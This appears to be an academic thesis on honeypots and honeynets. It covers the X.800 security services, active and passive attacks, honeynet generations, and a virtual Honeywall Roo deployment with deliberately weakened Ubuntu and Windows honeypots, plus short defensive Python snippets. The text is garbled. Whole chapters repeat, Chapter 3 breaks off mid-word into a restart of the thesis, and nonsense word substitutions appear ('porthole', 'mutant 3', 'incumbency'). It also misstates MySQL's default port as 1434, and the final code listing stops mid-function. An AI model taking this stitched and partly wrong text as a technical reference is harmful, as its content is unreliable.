Information security is the protection of all sensitive information, electronic or otherwise, which is owned by an individual or an organization. It deals with the preservation of the confidentiality, integrity and availability of information.
It protects the information of organizations from all kinds of threats to ensure business continuity, minimize business damage and maximize the return on investment and business opportunities. Information stored is highly confidential and not for public viewing. Through information security we protect its availability, privacy and integrity.

Information is one of the most important assets of financial institutions. Fortification of information assets is essential to establish and maintain trust between the financial institution and its customers, maintain compliance with the law, and protect the reputation of the institution. Timely and reliable information is required to process transactions and support financial institution and customer decisions. A financial institution's earnings and capital can be adversely affected if information becomes known to unauthorized parties, is distorted, or is not available when it is required [15].

1.2 Network Security

Network security is the protection of networks and their services from any unauthorized access. It includes the confidentiality and integrity of all data passing through the network. It also includes the security of all network devices and all information assets connected to a network, as well as protection against all kinds of known and unknown attacks.

The ITU-T Security Architecture for Open Systems Interconnection (OSI) document X.800 and RFC 2828 are the standard documents defining security services. X.800 divides the security services into 5 categories and 14 specific services, which can be summarized as in Table 1.1: OSI X.800 Summary [8].

1.
AUTHENTICATION: The assurance that the communicating entity is the one that it claims to be.
- Peer Entity Authentication: Used in association with a logical connection to provide confidence in the identity of the entities connected.
- Data Origin Authentication: In a connectionless transfer, provides assurance that the source of received data is as claimed.

2. ACCESS CONTROL: The prevention of unauthorized use of a resource (i.e., this service controls who can have access to a resource, under what conditions access can occur, and what those accessing the resource are allowed to do).

3. DATA CONFIDENTIALITY: The protection of data from unauthorized disclosure.
- Connection Confidentiality: The protection of all user data on a connection.
- Connectionless Confidentiality: The protection of all user data in a single data block.
- Selective-Field Confidentiality: The confidentiality of selected fields within the user data on a connection or in a single data block.
- Traffic Flow Confidentiality: The protection of the information that might be derived from observation of traffic flows.

4.
DATA INTEGRITY: The assurance that data received are exactly as sent by an authorized entity (i.e., contain no modification, insertion, deletion, or replay).
- Connection Integrity with Recovery: Provides for the integrity of all user data on a connection and detects any modification, insertion, deletion, or replay of any data within an entire data sequence, with recovery attempted.
- Connection Integrity without Recovery: As above, but provides only detection without recovery.
- Selective-Field Connection Integrity: Provides for the integrity of selected fields within the user data of a data block transferred over a connection and takes the form of determination of whether the selected fields have been modified, inserted, deleted, or replayed.
- Connectionless Integrity: Provides for the integrity of a single connectionless data block and may take the form of detection of data modification. Additionally, a limited form of replay detection may be provided.
- Selective-Field Connectionless Integrity: Provides for the integrity of selected fields within a single connectionless data block; takes the form of determination of whether the selected fields have been modified.

5. NONREPUDIATION: Provides protection against denial by one of the entities involved in a communication of having participated in all or part of the communication.
- Nonrepudiation, Origin: Proof that the message was sent by the specified party.
- Nonrepudiation, Destination: Proof that the message was received by the specified party. [1][8][9]

1.3 The Security Problem

System security personnel are fighting an unending battle to secure their digital assets against ever increasing attacks; the variety of attacks and their intensity is increasing day by day.
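The data integrity and data origin authentication services listed above can be illustrated with a short sketch using Python's standard hmac module (the key and messages are made up for the example): a message authentication tag verifies both that the data was not modified in transit and that it came from a holder of the shared key.

```python
import hmac
import hashlib

# Shared secret between sender and receiver (hypothetical example key).
KEY = b"example-shared-secret"

def tag(message: bytes) -> bytes:
    """Compute an HMAC-SHA256 tag providing integrity + origin authentication."""
    return hmac.new(KEY, message, hashlib.sha256).digest()

def verify(message: bytes, received_tag: bytes) -> bool:
    """Constant-time comparison to avoid timing side channels."""
    return hmac.compare_digest(tag(message), received_tag)

msg = b"transfer 100 to account 42"
t = tag(msg)
print(verify(msg, t))                            # True: untouched message
print(verify(b"transfer 900 to account 42", t))  # False: modification detected
```

Note that an HMAC alone gives integrity and origin authentication but not nonrepudiation: since both parties share the key, either could have produced the tag, which is why nonrepudiation in X.800 requires asymmetric mechanisms.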
Most attacks are detected after the exploitation, so there should be awareness of the threats and vulnerabilities that exist in the Internet today.

First, we have to understand that we cannot say there exists a perfectly secure machine or network, because the closest we can get to an absolutely secure machine is to unplug the network cable and power supply and put that machine into a safe. Unfortunately, it is not usable in that state. We cannot achieve perfect security and perfect access at the same time; we can only limit the number of doors, but we cannot put a wall in place of the doors. In the field of security we need to find the vulnerabilities and exploits before they affect us. Honeypots and honeynets provide a valuable tool to collect information about the behavior of attackers in order to design and implement better defenses.

In the field of security it is important to note that we cannot simply ask, "what is the best type of firewall?" Absolute security and absolute access are the two chief points, and they are inverse to each other: if we increase security, access will decrease. There should be a balance between the two, so that access is given without compromising the security.

If we compare this to our daily lives, we observe not much difference. We are constantly making decisions regarding what risks we are ready to take. When we step out of our homes we are taking a risk. As we get into a car and drive to our workplace there is a risk associated with that too. There is a possibility that something might happen on the highway which will make us part of an accident. When we fly on an airplane we are willing to accept the level of risk which is at par with the considerable amount we are paying for this convenience.
It is observed that many people think differently about what an acceptable risk would be, and in the majority of cases they do not go beyond this threshold. For instance, if I am sitting upstairs in my room and have to go to work, I won't take a jump straight out of the window. It might be a faster way, but the danger of doing so and the injury I would face is much greater than the convenience. It is vital for every organization to decide where, between the two opposite poles of total security and total access, it needs to place itself. It is necessary for a policy to articulate this position and then further explain the way it will be enforced, with which practices and means. Everything that is done under the name of security must strictly conform to the policy.

1.4 Types of Hackers

Hackers are more often than not divided into two major categories.

1.4.1 Black Hats

Black hat hackers are the biggest threat, both internal and external, to the IT infrastructure of any organization, as they are consistently challenging the security of applications and services. They are also called crackers. These are the persons who specialize in unauthorized infiltration. There could be a variety of reasons for this type of penetration: it could be for profit, for enjoyment, for political motivations, or as part of a social cause. Such infiltration often involves modification or destruction of data.

1.4.2 White Hats

White hat hackers are similar to black hat hackers, but there is an important difference: white hat hackers do it without any criminal intention. Different companies all around the world involve/contact these kinds of persons to test their systems and software. They check how secure these systems are and point out any faults they find. These hackers, also known as ethical hackers, are the persons or security experts who specialize in penetration testing. These types of people are also known as tiger teams.
These experts may use different types of methods and techniques to carry out their tests, including social engineering tactics, use of hacking tools, and attempts to bypass security to gain entry into protected areas, but they do this only to find weaknesses in the system [8].

1.5 Types of Attacks

Attacks can be grouped under two major categories: active attacks and passive attacks.

1.5.1 Active Attacks

Active attacks involve the attacker taking the offensive and directing malicious packets towards victims in order to gain illegal access to the target machine, such as by performing exhaustive username/password combinations as in brute-force attacks, or by exploiting remote and local vulnerabilities in services and applications that are termed holes. Other types of attacks include:

Masquerading attack: the attacker pretends to be a different entity, using the false identity of some legitimate user.

Replay attack: the attacker captures data and retransmits it to produce an unauthorized effect. It is a kind of man-in-the-middle attack.

Modification attack: in this type of attack the integrity of the message is compromised; the message or file is modified by the attacker to achieve his malicious goals.

Denial of service (DoS) attack: the attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.

TCP/ICMP scanning is also a form of active attack, in which attackers exploit the way protocols are designed to respond, e.g.
ping of death, SYN attacks, etc.

In all types of active attacks the attacker creates noise over the network and transmits packets, making it possible to detect and trace the attacker. Depending on the skill level, it has been observed that skilled attackers commonly attack their victims from proxy destinations that they have compromised earlier.

1.5.2 Passive Attacks

Passive attacks involve the attacker being able to intercept, collect and monitor any transmission sent by their victims, thus eavesdropping on the victim and, in the process, being able to listen in to the victim's or target's communications. Passive attacks are very specialized types of attacks which are aimed at obtaining information that is being transmitted over secure and insecure channels. Since the attacker creates no noise, or minimal noise, on the network, it is very difficult to detect and identify them. Passive attacks can be divided into two main types: the release of message contents and traffic analysis.

Release of message contents: this involves protecting message content from getting into the hands of unauthorized users during transmission. This can be as basic as a message delivered via a telephone conversation, instant messenger chat, email or a file.

Traffic analysis: this involves techniques used by attackers to determine the actual message from the encrypted intercepted messages of their victims. Encryption provides a means to mask the contents of a message using mathematical formulas and thus make them unreadable. The original message can only be retrieved by a reverse process called decryption. This cryptographic system is often based on a key or a password as input from the user.
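A toy sketch makes both points concrete. The XOR keystream below is purely illustrative and NOT a real cipher; the key and message are invented for the example. Encryption masks the contents, yet a passive observer can still read metadata such as message length, which is exactly what traffic analysis exploits.

```python
import itertools

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Toy XOR 'encryption' for illustration only -- NOT cryptographically secure."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))

key = b"example-key"          # hypothetical shared secret
plaintext = b"attack at dawn"
ciphertext = xor_cipher(plaintext, key)

print(ciphertext != plaintext)                    # True: contents are masked
print(xor_cipher(ciphertext, key) == plaintext)   # True: decryption reverses encryption
print(len(ciphertext) == len(plaintext))          # True: length still leaks to an observer
```

The last line is the traffic-analysis lesson: even without breaking the cipher, an eavesdropper learns when messages are sent, how long they are, and how often, which can be enough to infer a great deal.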
With traffic analysis the attacker can passively observe patterns, trends, frequencies and lengths of messages to guess the key or retrieve the original message by various cryptanalysis techniques.

Chapter 2: Honeypot and Honeynet

2.1 Honeypot

A honeypot is a system, or part of a system, deliberately made to invite an intruder or system cracker. Honeypots have additional functionality and intrusion detection systems built into them for the collection of valuable information on the intruders. The era of virtualization had its impact on security and honeypots; the community responded, marked by the fine efforts of Niels Provos (founder of honeyd) and Thorsten Holz with their masterpiece book Virtual Honeypots: From Botnet Tracking to Intrusion Detection in 2007.

2.2 Types of Honeypots

Honeypots can be categorized into two main types, based on level of interaction and on deployment.

2.2.1 Level of Interaction

The level of interaction determines the amount of functionality a honeypot provides.

2.2.1.1 Low-Interaction Honeypots

Low-interaction honeypots are limited in the extent of their interaction with the attacker. They are generally emulators of services and operating systems.

2.2.1.2 High-Interaction Honeypots

High-interaction honeypots are complex solutions; they involve the deployment of real operating systems and applications. High-interaction honeypots gather extensive amounts of information by allowing the attacker to interact with real systems.

2.2.2 Deployment

Based on deployment, honeypots may be classified as production honeypots and research honeypots.

2.2.2.1 Production Honeypots

Production honeypots are honeypots that are placed within production networks for the purpose of detection. They extend the capabilities of intrusion detection systems. These types of honeypots are developed and configured to integrate with the organization's infrastructure and scope.
They are usually implemented as low-interaction honeypots, but the implementation may vary depending on the available funding and the expertise required by the organization. Production honeypots can be placed within the application and authentication server subnets and can identify any attacks directed towards those subnets; thus they can be used to identify both internal and external threats for an organization. These types of honeypots can also be used to detect malware propagation in the network caused by zero-day exploits. Since IDS detection is based on database signatures, IDSs fail to detect exploits that are not defined in their databases. This is where honeypots outshine intrusion detection systems: they aid the system and network administrators by providing network situational awareness. On the basis of these results, administrators can take the decisions necessary to add or enhance the security resources of the organization, e.g. firewall, IDS, IPS etc.

2.2.2.2 Research Honeypots

Research honeypots are deployed by network security researchers, the whitehat hackers. Their primary goal is to learn the tools, tactics and techniques of the blackhat hackers by which they exploit computer and network systems. These honeypots are deployed with the idea of allowing the attacker complete freedom and, in the process, learning his tactics from his movement within the system. Research honeypots help security researchers to isolate the attacker tools that are used to exploit systems. These tools are then carefully studied within a sandbox environment to identify zero-day exploits. Worms, Trojans and viruses propagating in the network can also be isolated and studied. The researchers then document their findings and share them with system programmers, network and system administrators, and various system and anti-virus vendors. They provide the raw material for the rule engines of IDS, IPS and firewall systems. Research honeypots act as early warning systems.
They are designed to detect and log maximum information from attackers while being stealthy enough not to let attackers identify them. The identity of the honeypot is crucial, and we can conclude that the learning curve (from the attacker) is directly proportional to the stealthiness of the honeypot. These types of honeypots are usually deployed at universities and by the R&D departments of various organizations, and they are usually deployed as high-interaction honeypots.

2.3 Honeynet

The concept of the honeypot is sometimes extended to a network of honeypots, known as a honeynet. In a honeynet we group different types of honeypots with different operating systems, which increases the probability of trapping an attacker. At the same time, a setting in which the attacker explores the honeynet through network connections between the various host systems provides additional prospects for monitoring the attack and reveals information about the intruder. The honeynet operator can also use the honeynet for training purposes, gaining valuable experience with attack strategies and digital forensics without endangering production systems.

The Honeynet Project is a non-profit research organization that provides tools for building and managing honeynets. The tools of the Honeynet Project are designed for the latest generation of high-interaction honeynets, which require two separate networks. The honeypots reside on the first network, and the second network holds the tools for managing the honeynet. Between these tools (and facing the Internet) is a device known as the honeywall. The honeywall, which is actually a kind of gateway device, captures, controls, and analyzes all inbound and outbound traffic to the honeypots [4]. A honeynet is a high-interaction honeypot designed to capture a wide range of information on threats.
High-interaction means that a honeynet provides real systems, applications, and services for attackers to interact with, as opposed to low-interaction honeypots, which provide emulated services and operating systems. It is through this extensive interaction that we gain information on threats, both external and internal to an organization. What makes a honeynet different from most honeypots is that it is a network of real computers for attackers to interact with. These victim systems (honeypots within the honeynet) can be any type of system, service, or information you want to provide [14].

2.4 Honeynet Data Management

Data management consists of three processes: data control, data capture and data collection.

2.4.1 Data Control

Data control is the containment of activity within the honeynet. It determines the means through which the attacker's activity can be restricted in a way that avoids damaging/abusing other systems or resources through the honeynet. This demands a great deal of planning, as we need to give the attacker freedom in order to learn from his moves, and at the same time not let our resources (honeypot + bandwidth) be used to attack, damage and abuse other hosts on the same or different subnets. Careful measures are taken by the administrators of the honeynet to study and formulate a policy on attacker freedom versus containment, and to implement it in a way that achieves maximum data control while not being discovered or identified by the attacker as a honeypot. Security is a process and is implemented in layers; various mechanisms to achieve data control are available, such as firewalls, counting outbound connections, intrusion detection systems, intrusion prevention systems and bandwidth restriction. Depending on our requirements and the risk thresholds defined, we can implement data control mechanisms accordingly [4].

2.4.2 Data Capture

Data capture involves the capturing, monitoring and logging of all threats and attacker activities within the honeynet.
Analysis of this captured data provides an insight into the tools, tactics, techniques and motives of the attackers. The concept is to achieve maximum logging capability at all nodes and hence log any kind of attacker interaction without the attacker knowing it. This type of stealthy logging is achieved by setting up tools and mechanisms on the honeypots to log all system activity, and by having network logging capability at the honeywall. Every bit of information is crucial in studying the attacker, whether it is a TCP port scan, a remote or local exploit attempt, a brute force attack, an attack tool download by the hacker, various local commands run, any type of communication carried out over encrypted or unencrypted channels (mostly IRC), or any outbound connection attempt made by the attacker [25]. All of this should be logged successfully and sent to a remote location to avoid any loss of data due to the risk of system damage caused by attackers, such as data being wiped from the disk. In order to avoid detection of this kind of activity by the attacker, data masking techniques such as encryption should be used.

2.4.3 Data Collection

Once data is captured, it is securely sent to a centralized data collection point. Data collected from the different honeynet sensors is used for analysis and archiving. Implementations may vary depending on the requirements of the organization; however, the latest implementations incorporate data collection at the honeywall gateway [19].

2.5 Honeynet Architectures

There are three honeynet architectures, namely Generation I, Generation II and Generation III.

2.5.1 Generation I Architecture

The Gen I honeynet was developed in 1999 by the Honeynet Project. Its purpose was to capture attacker activity and give attackers the feeling of a real network. The architecture is simple, with a firewall aided by an IDS at the front and honeypots placed behind it.
This makes it detectable by the attacker [7].

2.5.2 Generation II and III Architecture

Gen II honeynets were first introduced in 2001, and Gen III honeynets were released at the end of 2004. Gen II honeynets were made in order to address the issues of Gen I honeynets. Gen II and Gen III honeynets have the same architecture, the only difference being improvements in deployment and management in Gen III honeynets, along with the addition of a Sebek server built into the honeywall. Sebek is a stealthy capture tool installed on honeypots that captures and logs all requests sent to the system's read and write system calls. This is very helpful in providing an insight into the attacker [7]. A radical change in architecture was brought about by the introduction of a single device that handles the data control and data capture mechanisms of the honeynet, called the IDS Gateway or, marketing-wise, the Honeywall. By making the architecture more stealthy, attackers are kept longer and thus more data is captured. There was also a major thrust in improving the honeypot layer of data capture with the introduction of new UNIX- and Windows-based data capture tools.

2.6 Virtual Honeynet

Virtualization is a technology that allows running multiple virtual machines on a single physical machine. Each virtual machine can be an independent operating system installation. This is achieved by sharing the physical machine's resources, such as CPU, memory, storage and peripherals, through specialized software across multiple environments. Thus multiple virtual operating systems can run concurrently on a single physical machine [4]. A virtual machine is specialized software that can run its own operating systems and applications as if it were a physical computer.
It has its own CPU, RAM, storage and peripherals, managed by software that dynamically shares them with the physical hardware resources.

A virtual honeynet is a solution that allows one to run a honeynet on a single computer. We use the term virtual because all the different operating systems placed in the honeynet have the appearance of running on their own independent computers. Network traffic to a machine on the honeynet may indicate a compromised enterprise system.

Chapter 3: Design and Implementation

Computer networks connected to the Internet are vulnerable to a variety of exploits that can compromise their intended operations. Systems can be subject to denial of service attacks, i.e. attacks preventing other computers from gaining access to a desired service (e.g. a web server) or preventing them from connecting to other computers on the Internet. They can also be subject to attacks that cause them to cease operations, either temporarily or permanently. A hacker may be able to compromise a system and gain root access as if he were the system administrator. The number of exploits targeted against various platforms, operating systems, and applications is increasing regularly. Most vulnerabilities and attack methods are detected after the exploitation and cause big losses.

The following are the main components of the physical deployment of the honeynet. First is the design of the deployed architecture. Then we installed Sun VirtualBox as the virtualization software, on which we virtually installed three operating systems: two of them work as honeypots and one, Honeywall Roo 1.4, as the honeynet's transparent gateway. Snort and Sebek are part of the Honeywall Roo operating system: Snort as IDS, Snort-inline as IPS, and Sebek as the data capture tool on the honeypots. The entire OS and honeywall functionality is installed on the system; the installation formats all previous data from the hard disk. The only purpose of the CDROM is now to install this functionality to the local hard drive.
LiveCD could not be modified, so after installing it on the hard drive we can modify it according to our requirement. This approach help us to maintain the honeywall, allowing honeynet to use automated tools such asyumto keep packages current 31.In the following table there is a summry of products with features installed in honeynet and hardware requirements. Current versions of the installed products are also mention in the table.Table 3.1 Project SummaryProject SummaryFeatureProductSpecificationsHost Operating SystemWindows Server 2003 R2HW Vendor HP Compaq DC 7700 central processorIntel(R) Pentium D CPU 3GHzRAM 2GBStorage 120GBNIC 1GB Ethernet controller (public IP )Guest Operating System 1Linux, Honeywall Roo 1.4 champion Processor Virtual Machine( HONEYWALL )RAM 512 MBStorage 10 GBNIC 1 100Mbps Bridged portholeNIC 2 100Mbps host-only interfaceNIC 3 100Mbps Bridged interface(public IP )Guest Operating System 2Linux, Ubuntu 8.04 LTS (Hardy Heron)Single Processor Virtual Machine( HONEYPOT )RAM 256 MBStorage 10 GBNIC 100Mbps host-only vmnet (public IP )Guest Operating System 3Windows Server 2003Single Processor Virtual Machine( HONEYPOT )RAM 256 MBStorage 10 GBNIC 100Mbps host-only vmnet (public IP )Virtualization softwareSUN Virtual Box mutant 3ArchitectureGen IIIGen III implemented as a virtual honeynetHoneywallRooRoo 1.4IDSSnortSnort 2.6.xIPSSnort_inlineSnort_inline 2.6.1.5Data Capture Tool (on honeypots)SebekSebek 3.2.0Honeynet Project Online incumbencyNovember 12, 2009 TO December 12, 20093.1 Deployed Architecture and Design3.2 Windows Server 2003 as Host OSUsability and procedure of virtualiza tion softwares are very good on windows server 2003. Windows Server 2003is aserveroperating system produced byMicrosoft. it is considered by Microsoft to be the cornerstone of itsWindows Server Systemline of business server products. 
Windows Server 2003 is more scalable and delivers better performance than its predecessor,Windows 2000.3.3 Ubuntu as HoneypotDetermined to use free and open source software for this project, Linux was the natural choice to fill as the Host Operating System for our projects server. Ubuntu 8.04 was used as a linux based honeypot for our implementation. The concept was to setup an up-to-date Ubuntu server, cond with commonly used services such as SSH, FTP, Apache, MySQL and PHP and study attacks directed towards them on the internet. Ubuntu being the most wide used Linux desktop can prove to be a good platform to study zero day exploits. It also becomes a candidate for malware collection and a source to learn hacker tools being used on the internet. Ubuntu was successfully deployed as a virtual machine and setup in our honeynet with a host-only virtual Ethernet connection. The honeypot was made sweeter i.e. an interesting target for the attacker by setting up all services with default settings, for example SSH allowed password based connectivity from any IP on default port 22, users created were given privileges to install and run applications, Apache index.html page was made remotely accessible with default errors and banners, MySQL default port 1434 was accessible and outbound connections were allowed but limited 3.Ubuntu is a computeroperating systembased on theDebianGNU/Linux distribution. It is named after theSouthern Africanethical political theory Ubuntu (humanity towards others)5and is distributed asfree and open source software. Ubuntu provides an up-to-date, stable operating system for the average user, with a strong focus onusabilityand ease of installation. Ubuntu focuses onusability andsecurity. The Ubiquity installer a llows Ubuntu to be installed to the hard disk from within the Live CD environment, without the need for restarting the computer prior to installation. 
Ubuntu also emphasizesaccessibilityandinternationalization to chance on as many people as possible 33.Ubuntu comes installed with a wide range of software that includes OpenOffice, Firefox,Empathy (Pidgin in versions before 9.10), Transmission, GIMP, and several lightweight games (such as Sudoku and chess). Ubuntu allows networking ports to be closed using its firewall, with customized port selectioAnalysis of Honeynets and Honeypots for SecurityAnalysis of Honeynets and Honeypots for SecurityChapter 1 IntroductionHoneynet is a kind of a network security tool, most of the network security tools we have are passive in nature for example Firewalls and IDS. They have the dynamic database of available rules and signatures and they operate on these rules. That is why anomaly detection is limited only to the set of available rules. Any act ivity that is not in alignment with the given rules and signatures goes under the radar undetected. Honeypots by design allows you to take the initiative, and trap those bad guys (hackers). This system has no production value, with no authorized activity. Any interaction with the honeypot is considered malicious in intent. The combination of honeypots is honeynet. Basically honeypots or honeynets do not solve the security problem but provide information and knowledge that help the system administrator to enhance the overall security of his network and systems. This knowledge can act as an Intrusion detection system and used as input for any early warning systems. Over the years researchers have successfully isolated and identified verity of worms exploits using honeypots and honeynets.Honeynets extend the concept of a single honeypot to a highly controlled network of honeypots. A honeynet is a specialized network architecture cond in a way to achieve Data Control, Data Capture Data Collection. 
This architecture builds a controlled network in which one can control and monitor all kinds of system and network activity.

1.1 Information Security

Information security is the protection of all sensitive information, electronic or otherwise, owned by an individual or an organization. It deals with preserving the confidentiality, integrity and availability of information. It protects the information of organizations from all kinds of threats to ensure business continuity, minimize business damage and maximize the return on investment and business opportunities. Stored information is often highly confidential and not for public viewing; through information security we protect its availability, privacy and integrity.

Information is one of the most important assets of financial institutions. Fortification of information assets is essential to establish and maintain trust between the financial institution and its customers, maintain compliance with the law, and protect the reputation of the institution. Timely and reliable information is required to process transactions and support financial institution and customer decisions. A financial institution's earnings and capital can be adversely affected if information becomes known to unauthorized parties, is distorted, or is not available when it is needed [15].

1.2 Network Security

Network security is the protection of networks and their services from any unauthorized access. It includes the confidentiality and integrity of all data passing through the network, the security of all network devices and all information assets connected to a network, and protection against all kinds of known and unknown attacks.

The ITU-T Security Architecture for Open Systems Interconnection (OSI) document X.800 and RFC 2828 are the standard documents defining security services. X.800 divides the security services into 5 categories and 14 specific services, summarized below.

Table 1.1: OSI X.800 Summary [8]
1. AUTHENTICATION: the assurance that the communicating entity is the one that it claims to be.
   - Peer Entity Authentication: used in association with a logical connection to provide confidence in the identity of the entities connected.
   - Data Origin Authentication: in a connectionless transfer, provides assurance that the source of received data is as claimed.

2. ACCESS CONTROL: the prevention of unauthorized use of a resource (i.e., this service controls who can have access to a resource, under what conditions access can occur, and what those accessing the resource are allowed to do).

3. DATA CONFIDENTIALITY: the protection of data from unauthorized disclosure.
   - Connection Confidentiality: the protection of all user data on a connection.
   - Connectionless Confidentiality: the protection of all user data in a single data block.
   - Selective-Field Confidentiality: the confidentiality of selected fields within the user data on a connection or in a single data block.
   - Traffic Flow Confidentiality: the protection of the information that might be derived from observation of traffic flows.

4. DATA INTEGRITY: the assurance that data received are exactly as sent by an authorized entity (i.e., contain no modification, insertion, deletion, or replay).
   - Connection Integrity with Recovery: provides for the integrity of all user data on a connection and detects any modification, insertion, deletion, or replay of any data within an entire data sequence, with recovery attempted.
   - Connection Integrity without Recovery: as above, but provides only detection without recovery.
   - Selective-Field Connection Integrity: provides for the integrity of selected fields within the user data of a data block transferred over a connection and determines whether the selected fields have been modified, inserted, deleted, or replayed.
   - Connectionless Integrity: provides for the integrity of a single connectionless data block and may take the form of detection of data modification. Additionally, a limited form of replay detection may be provided.
   - Selective-Field Connectionless Integrity: provides for the integrity of selected fields within a single connectionless data block; determines whether the selected fields have been modified.

5. NONREPUDIATION: provides protection against denial, by one of the entities involved in a communication, of having participated in all or part of the communication.
   - Nonrepudiation, Origin: proof that the message was sent by the specified party.
   - Nonrepudiation, Destination: proof that the message was received by the specified party. [1][8][9]

1.3 The Security Problem

System security personnel are fighting an unending battle to secure their digital assets against ever increasing attacks; the variety of attacks and their intensity grow day by day. Most attacks are detected only after exploitation, so there must be awareness of the threats and vulnerabilities that exist on the Internet today.

First we have to understand that no perfectly secure machine or network exists. The closest we can get to an absolutely secure machine is to unplug the network cable and power supply and put the machine in a safe, and it is not useful in that state. We cannot achieve perfect security and perfect access at the same time; we can only limit the number of doors, not replace them with walls. In the field of security we need to find vulnerabilities and exploits before they affect us. Honeypots and honeynets provide a valuable tool for collecting information about the behavior of attackers in order to design and implement better defenses.

In security it is important to note that we cannot simply ask "what is the best type of firewall?" Absolute security and absolute access are the two chief poles, and they are inverse to each other: if we increase security, access decreases.
There should be a balance between absolute security and absolute access: access is given without compromising security.

If we compare this to our daily lives we observe not much difference. We are continuously making decisions about what risks we are ready to take. When we step out of our homes we take a risk. As we get into a car and drive to our workplace there is a risk associated with that too. There is a possibility that something might happen on the highway and make us part of an accident. When we fly in an airplane we are willing to undergo the level of risk that comes with the price we pay for the convenience. Many people think differently about what an acceptable risk would be, and in most cases they do not go beyond that threshold. For instance, if I am sitting upstairs in my room and have to go to work, I won't jump straight out of the window; it might be faster, but the danger of injury outweighs the convenience. It is vital for every organization to decide where, between the two opposite poles of total security and total access, it needs to place itself. A policy must articulate this position and then explain how it will be enforced, with which practices and in what ways. Everything done in the name of security must strictly follow the policy.

1.4 Types of Hacker

Hackers are generally divided into two major categories.

1.4.1 Black Hats

Black hat hackers are the biggest threat, both internal and external, to the IT infrastructure of any organization, as they consistently challenge the security of applications and services. Also called crackers, these are persons who specialize in unauthorized infiltration. There can be a variety of reasons for this kind of penetration: profit, enjoyment, political motivation, or a social cause. Such infiltration often involves modification or destruction of data.

1.4.2 White Hats

White hat hackers are similar to black hat hackers, with the important difference that white hat hackers work without any criminal intention. Companies all around the world hire or contract these people to test their systems and software; they check how secure the systems are and point out any faults they find. These hackers, also known as ethical hackers, are security experts who specialize in penetration testing; such teams are also known as tiger teams. They may use different methods and techniques to carry out their tests, including social engineering tactics, hacking tools, and attempts to bypass security to gain entry into protected areas, but they do this only to find weaknesses in the system [8].

1.5 Types of Attacks

Attacks fall under two major categories: active attacks and passive attacks.

1.5.1 Active Attacks

Active attacks involve the attacker taking the offensive and directing malicious packets towards the victim in order to gain illegitimate access to the target machine, for example by performing exhaustive user/password combinations in brute-force attacks, or by exploiting remote and local vulnerabilities ("holes") in services and applications. Other types of active attack include:

- Masquerade attack: the attacker pretends to be a different entity, using the fake identity of some legitimate user.
- Replay attack: the attacker captures data and retransmits it to produce an unauthorized effect; a kind of man-in-the-middle attack.
- Modification attack: the integrity of the message is compromised; a message or file is modified by the attacker to achieve his malicious goals.
- Denial of Service (DoS) attack: the attacker attempts to prevent legitimate users from accessing information or services.
By targeting your computer and its network connection, or the computers and networks of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer. TCP and ICMP scanning are also forms of active attack, in which attackers exploit the way protocols are designed to respond, e.g. ping of death, SYN attacks, etc.

In all types of active attack the attacker creates noise over the network and transmits packets, making it possible to detect and trace him. It has been observed that skilled attackers usually attack their victims from proxy hosts that they have victimized earlier.

1.5.2 Passive Attacks

Passive attacks involve the attacker intercepting, collecting and monitoring transmissions sent by the victims, eavesdropping on the victim's or target's communications. Passive attacks are specialized attacks aimed at obtaining information that is being transmitted over secure and insecure channels. Since the attacker creates no noise, or minimal noise, on the network, it is very difficult to detect and identify him. Passive attacks can be divided into two main types: the release of message content, and traffic analysis.

Release of message content: this concerns protecting message content from getting into the hands of unauthorized users during transmission. The content can be as basic as a message delivered in a telephone conversation, an instant messenger chat, an email or a file.

Traffic analysis: this covers techniques used by attackers to retrieve the actual message from encrypted, intercepted messages. Encryption masks the contents of a message using mathematical formulas, making it unreadable; the original message can only be retrieved by the reverse process, called decryption.
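The inverse relationship between encryption and decryption just described can be illustrated with a toy XOR cipher. This is only a didactic sketch (a real system would use a vetted algorithm such as AES, and the function name here is our own), but it shows how the same key both masks and recovers the message:

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Mask each byte of `data` with the repeating `key`.

    XOR is its own inverse, so the same call both encrypts and
    decrypts: applying it twice with the same key recovers the
    original message.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

message = b"transfer 100 to account 42"
key = b"s3cret"

ciphertext = xor_cipher(message, key)    # unreadable without the key
recovered = xor_cipher(ciphertext, key)  # the reverse process: decryption

assert ciphertext != message
assert recovered == message
```

A passive attacker who intercepts `ciphertext` cannot read it directly, which is exactly why traffic analysis falls back on observable metadata such as message lengths and frequencies.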
This cryptographic system is often based on a key or a password supplied by the user. With traffic analysis the attacker can passively observe patterns, trends, frequencies and lengths of messages to guess the key or retrieve the original message by various cryptanalysis techniques.

Chapter 2: Honeypot and Honeynet

2.1 Honeypot

A honeypot is a system, or part of a system, deliberately set up to invite an intruder or system cracker. Honeypots have additional functionality and intrusion detection systems built into them for the collection of valuable information on the intruders. The era of virtualization had its impact on security and honeypots, and the community responded, marked by the fine efforts of Niels Provos (founder of honeyd) and Thorsten Holz in their book "Virtual Honeypots: From Botnet Tracking to Intrusion Detection" (2007).

2.2 Types of Honeypots

Honeypots can be categorized into two main types, based on level of interaction and on deployment.

2.2.1 Level of Interaction

The level of interaction determines the amount of functionality a honeypot provides.

2.2.1.1 Low-Interaction Honeypots

Low-interaction honeypots are limited in the extent of their interaction with the attacker; they are generally emulators of services and operating systems.

2.2.1.2 High-Interaction Honeypots

High-interaction honeypots are complex solutions that involve the deployment of real operating systems and applications. They capture extensive amounts of information by allowing the attacker to interact with real systems.

2.2.2 Deployment

Based on deployment, honeypots may be classified as production honeypots or research honeypots.

2.2.2.1 Production Honeypots

Production honeypots are honeypots placed within production networks for the purpose of detection. They extend the capabilities of intrusion detection systems. These honeypots are developed and configured to integrate with the organization's infrastructure and scope.
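A low-interaction honeypot in the sense described above can be approximated in a few lines: a listener that emulates no real service, so any connection it records is suspect by definition. This is an illustrative sketch under our own naming, not the implementation used in this project:

```python
import socket
import threading
import time
from datetime import datetime, timezone

def honeypot_listener(srv: socket.socket, log: list, stop: threading.Event) -> None:
    """Accept connections on the pre-bound socket `srv` and log each one.

    A honeypot offers no legitimate service, so every connection
    attempt recorded here is considered suspicious by definition.
    """
    srv.listen()
    srv.settimeout(0.2)          # poll the stop flag between accepts
    while not stop.is_set():
        try:
            conn, addr = srv.accept()
        except socket.timeout:
            continue
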